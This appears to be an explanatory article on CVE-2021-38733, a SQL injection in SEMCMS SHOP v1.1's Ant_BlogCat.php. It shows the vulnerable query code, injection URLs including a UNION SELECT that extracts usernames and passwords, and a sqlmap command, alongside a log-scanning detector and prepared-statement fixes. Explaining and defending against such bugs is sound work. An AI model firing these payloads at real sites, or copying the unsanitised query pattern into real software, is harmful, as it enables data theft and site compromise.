The world of e-commerce software is full of security holes, and SEMCMS SHOP v1.1 is no exception. In 2021, a critical SQL Injection vulnerability was discovered in the platform’s Ant_BlogCat.php file. If you run this version of SEMCMS SHOP or you’re just curious about how SQL injections work, keep reading. This article breaks down the vulnerability, shows you how attackers exploit it, and helps you understand why it's dangerous.
What Is CVE-2021-38733?
CVE-2021-38733 is a unique identifier for a security vulnerability found in SEMCMS SHOP v1.1. The problem? The Ant_BlogCat.php script doesn’t properly clean (sanitize) data coming from user input, specifically the id parameter. As a result, attackers can inject dangerous SQL commands—potentially stealing data, taking over the site, or even wiping out the database.
Original references:
- CVE-2021-38733 on NVD (NIST)
- Exploit Database reference
The Vulnerable Code
Let’s take a look at a stripped-down, simplified version of the problematic code in Ant_BlogCat.php:
<?php
// Ant_BlogCat.php (simplified)
include("config.php"); // Database connection
$id = $_GET['id']; // Gets the id from URL, e.g., Ant_BlogCat.php?id=2
$sql = "SELECT * FROM sc_blogcat WHERE id = $id"; // Dangerous!
$result = mysqli_query($conn, $sql); // Executes the query
// Display results (simplified)
$data = mysqli_fetch_assoc($result);
echo $data['title'];
?>
The issue:
There is no input filtering or validation on the $id variable before it is placed directly into the SQL query string. Because the value is concatenated into the query rather than passed as a parameter, an attacker can change the SQL the database actually runs.
Let's say you're browsing a SEMCMS SHOP site and notice this page:
http://example.com/Ant_BlogCat.php?id=2
Instead of 2, an attacker could try:
http://example.com/Ant_BlogCat.php?id=2 OR 1=1
This makes the SQL query look like:
SELECT * FROM sc_blogcat WHERE id = 2 OR 1=1
OR 1=1 is always true, so the query returns all blog category records rather than the single row the developer intended, possibly leaking data that was never meant to be shown.
Dumping the Database via Union Select
Now, let's get a little more aggressive. Suppose an attacker wants to fetch usernames and passwords from a users table. They might use:
http://example.com/Ant_BlogCat.php?id=2 UNION SELECT 1,username,password FROM sc_users--
The double dash -- comments out the rest of the SQL query.
Here's the full attack in action, using SQLMap (a popular automated tool) to extract database info:
sqlmap -u "http://example.com/Ant_BlogCat.php?id=2" --dbs
This will automatically detect the injection point and list the database names. Depending on the privileges of the database account the site uses, an attacker could go on to fetch tables, records, and even credentials.
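Attempts like the ones above leave traces in the web server's access log, because the `id` parameter is supposed to be a plain integer. The following is an added example, not code from SEMCMS SHOP or from the original article: it scans constructed log lines in the common Apache/nginx "combined" format (an assumed layout) and flags any request to Ant_BlogCat.php whose decoded `id` is not an integer.

```python
"""Flag non-integer `id` values sent to Ant_BlogCat.php in access logs.

Added example: the page states that `id` should be a number, so any
request whose percent-decoded `id` is not a plain integer deserves a look.
All log lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx "combined" log format.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Oct/2022:16:15:00 +0000] "GET /Ant_BlogCat.php?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Oct/2022:16:15:03 +0000] "GET /Ant_BlogCat.php?id=2%20OR%201%3D1 HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Oct/2022:16:15:07 +0000] "GET /Ant_BlogCat.php?id=2+UNION+SELECT+1,username,password+FROM+sc_users-- HTTP/1.1" 200 1287 "-" "sqlmap/1.5"
203.0.113.5 - - [28/Oct/2022:16:15:09 +0000] "GET /index.php?id=2%20OR%201%3D1 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Oct/2022:16:15:11 +0000] "GET /Ant_BlogCat.php?id=17 HTTP/1.1" 200 480 "-" "Mozilla/5.0"
"""

# Fields of a "combined" log line: client IP, timestamp, request line, status, user agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
INT_RE = re.compile(r"^\d+$")


def flag_requests(log_text, script="/Ant_BlogCat.php", param="id"):
    """Return (client_ip, decoded_value, user_agent) for every request to
    `script` whose `param` value is not a plain non-negative integer."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the sweep
        parts = urlsplit(m.group("target"))
        if parts.path != script:
            continue
        # parse_qs percent-decodes and turns '+' into spaces, like PHP's $_GET,
        # so encoded payloads are compared in the form the application saw them.
        values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not INT_RE.match(value):
                hits.append((m.group("ip"), value, m.group("ua")))
    return hits


if __name__ == "__main__":
    for ip, value, ua in flag_requests(SAMPLE_LOG):
        print(f"{ip} sent id={value!r} (User-Agent: {ua})")
```

The same integer check, applied inside the script before the value reaches the query, is the allow-list validation that complements the prepared statement shown under mitigations.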
Don't trust user input! Here are some mitigations:
- Use Prepared Statements / Parameterized Queries:
$stmt = $conn->prepare("SELECT * FROM sc_blogcat WHERE id = ?");
$stmt->bind_param("i", $_GET['id']); // "i" binds the value as an integer, so "2 OR 1=1" can never become part of the SQL
$stmt->execute();
$data = $stmt->get_result()->fetch_assoc(); // Fetch the single matching row
- Validate the input before using it: reject any id that is not a plain integer (for example with filter_var($_GET['id'], FILTER_VALIDATE_INT)) and return an error instead of running the query.
Summary
CVE-2021-38733 is a textbook SQL injection bug in SEMCMS SHOP v1.1’s Ant_BlogCat.php. It’s both easy to exploit and potentially catastrophic for any online shop that ignores best practices. If you’re running this software, patch it or protect it now. And if you’re just learning, remember: never, ever trust user input in your code.
Further Reading
- OWASP SQL Injection
- PHP: Prepared Statements
- Original Exploit Report (Exploit-DB #50214)
Timeline
Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:49:00 UTC